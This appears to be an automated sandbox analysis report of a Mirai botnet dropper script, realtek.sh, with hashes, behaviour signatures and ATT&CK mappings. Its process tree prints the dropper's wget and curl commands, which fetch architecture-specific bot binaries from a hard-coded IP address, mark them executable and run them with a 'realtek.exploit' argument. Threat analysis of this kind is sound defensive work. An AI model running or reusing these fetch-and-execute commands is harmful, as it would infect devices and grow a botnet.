Analysis
-
max time kernel
41s -
max time network
63s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
11-12-2024 21:51
General
-
Target
realtek.sh
-
Size
2KB
-
MD5
84b175db7b86bd1fad6be93ca576a5e3
-
SHA1
e614d40c69e0386d9ccd3bdd80380c0a98f18b2b
-
SHA256
698fe2f6e7ebc4cf6b908cd64ce0f78266f254f807f9835715d7ba77423bbf49
-
SHA512
8d48bedea8b9a9ed61b30dd548b5c6f4d351a9636237f6d37b2d2780f39c416b9bf6aa2e6d7ae23bebb7b79573d6882f9de2c69a07ae55ff1d29c0131e0bb853
Malware Config
Extracted
mirai
BOTNET
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
Contacts a large (15869) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
File and Directory Permissions Modification 1 TTPs 11 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 11 IoCs
-
Modifies Watchdog functionality 1 TTPs 8 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Enumerates active TCP sockets 1 TTPs 2 IoCs
Gets active TCP sockets from /proc virtual filesystem.
-
UPX packed file 10 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Changes its process name 4 IoCs
-
Checks CPU configuration 1 TTPs 11 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads system network configuration 1 TTPs 2 IoCs
Uses contents of /proc filesystem to enumerate network settings.
-
Reads runtime system information 28 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 22 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/realtek.sh/tmp/realtek.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://37.114.41.90/bins/i4862⤵
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/i4862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat i4862⤵
-
-
/bin/chmodchmod +x Andrew i486 realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn2⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat x862⤵
-
-
/bin/chmodchmod +x Andrew i486 realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x862⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/i6862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat i6862⤵
-
-
/bin/chmodchmod +x Andrew i486 i686 realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x862⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/x86_642⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat x86_642⤵
-
-
/bin/chmodchmod +x Andrew i486 i686 realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x Andrew i486 i686 mips realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat mpsl2⤵
-
-
/bin/chmodchmod +x Andrew i486 i686 mips mpsl realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat arm42⤵
-
-
/bin/chmodchmod +x Andrew arm4 i486 i686 mips mpsl realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat arm52⤵
-
-
/bin/chmodchmod +x Andrew arm4 arm5 i486 i686 mips mpsl realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Changes its process name
- Reads runtime system information
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat arm62⤵
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 i486 i686 mips mpsl realtek.sh systemd-private-20076bb3c6f54b479a18bbb39bdc9df5-systemd-timedated.service-FxYDyn x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat arm72⤵
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 i486 i686 mips mpsl realtek.sh x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Enumerates active TCP sockets
- Changes its process name
- Reads system network configuration
- Reads runtime system information
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://37.114.41.90/bins/ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat ppc2⤵
-
-
/bin/chmodchmod +x Andrew arm4 arm5 arm6 arm7 i486 i686 mips mpsl ppc realtek.sh x86 x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/Andrew./Andrew realtek.exploit2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://37.114.41.90/bins/spc2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
50KB
MD5f7d3f5492706582a5f5fee4247d47082
SHA162b7d7ed9d823bc9f3e178075b0621f2c336b71d
SHA256e483255a1415b758c7c6cdc9ff0315bbe208eaf698487b886097563d867a7017
SHA51213c55acdaba42e75793d495c4c6ebf6fee6dc0eae89f83ec3ad197004242b4329c01bcf5356d03c6272290d8e3d10f997b970c5c21197ce945b6984669a6ff9a
-
Filesize
31KB
MD5b09e32f241911f4ddac45a1a7a19ba49
SHA117a7f213570aaea7f66b9c38091c9485fa0ea510
SHA25642828a483869a643cec73d181faff7f3a433c9570fc96a6bc63a2d8bc2b1f95c
SHA5121d7e94f3076da3e47e902cc523bb752d5333fcbe86a8f35e6ef11202b80e6021318ff8d60843a410a849dd46296e45ed452bfe01ea722df6bdbdd565fd954da5
-
Filesize
32KB
MD5bf55d7061cedeb10e6a3839353dc6d8c
SHA134b773230a77570ef0c6fced5ab9f125996e4daf
SHA256aae9d2a9669849b09b4e8ed8f3baeeb4c948ca80ebddd5004a57c2b6b7049fc9
SHA512555f6dec792e49927d5392fc8dae5174e8868c9acdddebd4d0a5b3386352df40c7342a82d0973979cdb5061ee347f4ebd33ce19ab98fbb6dcae293e1eb69c57e
-
Filesize
50KB
MD5d5af8f2bb8c7c3e39981ba0099fa1d1c
SHA1f12212c88dddb3c0298987b917c55063f942df88
SHA256fec20fde8f5cb8d571cee50a2bf8103c9e63c57b2bfd098693974389fd79c8d9
SHA51242b3455e467f11b68f000f6f375bd9d7f42d77c16184a3a6a36bbf4751e72a01b692032ee6d03a8ed398484cacbdb6231478d42099004f3674de84873c2e817e
-
Filesize
274B
MD5090e35476de39030dfeafbcf3d3e3f43
SHA1a4bd408cec5d1185b478e528cf60a9f5186e0b87
SHA2560085db6c6f0d1ba4e0ea26fcc04cd3afc69a900a9fd087079c4957364bf4dd1b
SHA51255c266d1a3bb285ec821ecac894c2f5dbae7798c08e4f829db0e8c06f22084a919ef0fb17a1ddf4640228453bee8555fa6f69025c398292c5c8382e3c466a181
-
Filesize
28KB
MD515fb222600a3061f5c8e5ef04e5298a6
SHA193b4a17632479c8a45e2554a18ea61ea7365c532
SHA256fff08f2a1a9c20d447ac5cacb89df1287bb830a2fc0cd5866d31d9f3ba653965
SHA51211e390838b35bdacfa84ebdfc076f564abc1538bc972895b81d2156be52177bb25d62662871ae624747cca29e089a7a9a6ef205db4c694a2c106641d33942c34
-
Filesize
34KB
MD56088a204e0792a10d3724e836fe699b7
SHA1fc1cf1010c99f155c46f94ec0529c8cea32c6055
SHA256345984c9618d8bbf1c6e4a70ea62edd4666132f3787dbf07ad118d620cab8a2e
SHA512bdf6dd68777d986f952a9d3aa5e505aaf360cda74d336c81f5ae1abebdebbdeb595f7bcdb26187f3c59fafbf545265b126435e3ead4346898f328e408bf8e48e
-
Filesize
34KB
MD5b8f2bf3e7c002718f12751cb02130d2e
SHA106919c90eae2564ee9ded3f343e2ec18839e411d
SHA256390f79cfca6cc7660d64c22208b4f2166807e5875da1a15336a9dccff130034d
SHA512adfccc7878b168cba5b9f9ce92f246bced0e15db876c28ed2f7e0ec5e344ec6652b643045ca79937de7655da4c71b77db2c778f8b8d11b196bfff156a7d16185
-
Filesize
30KB
MD5053488c4fc01a20ddb689a2212c33126
SHA11eff2d1947ee2d6481fdd2ab4b2a67fba3e18321
SHA2560a8cb5b485b059b98725ff4a6411faa3ea9f150082b46b0b3868ae0e31b6dd41
SHA51232d412546f202e9165cf6c905b46d52db20425b7ff7f90b98a739f6c7860b30c34e8bc5eaca4d6f23e25c6e88580990a6003fd9747d581e25098f3267e78f1f9
-
Filesize
28KB
MD554d07ade0004f03aaca028523d8f3eb6
SHA173606fc68439ea7ceb148f94d61dbe0235da8355
SHA256d1270e8be4de4713834930df984a515448ca8dd0acc7b0e03e5aa7fc4428882b
SHA51243ce9c67151734e6e907a4bf30c06e41b52d524c388273380506b604ce3fed2779ef057b282737b1e05c11055611a4bd0559567253fb1b0f3309114e20eadf4b
-
Filesize
28KB
MD59cc970e0631afa61a049848f4f368b12
SHA154d7d99f436e9c97da5bfdd43698bb1dbd679b29
SHA256681951c3fa70c2d14fe48e3c829f9f62f04f8fa9b430c0a87e849e397333dc16
SHA5129f5bcd759af164b0e22479d44806dce6d3ca3e2b62fa3ac154b83111804cd1ee1df4b549fff0e8ab72d2a2d66dadb0f8f1cc301fee83a711e5c4055c2ee3567e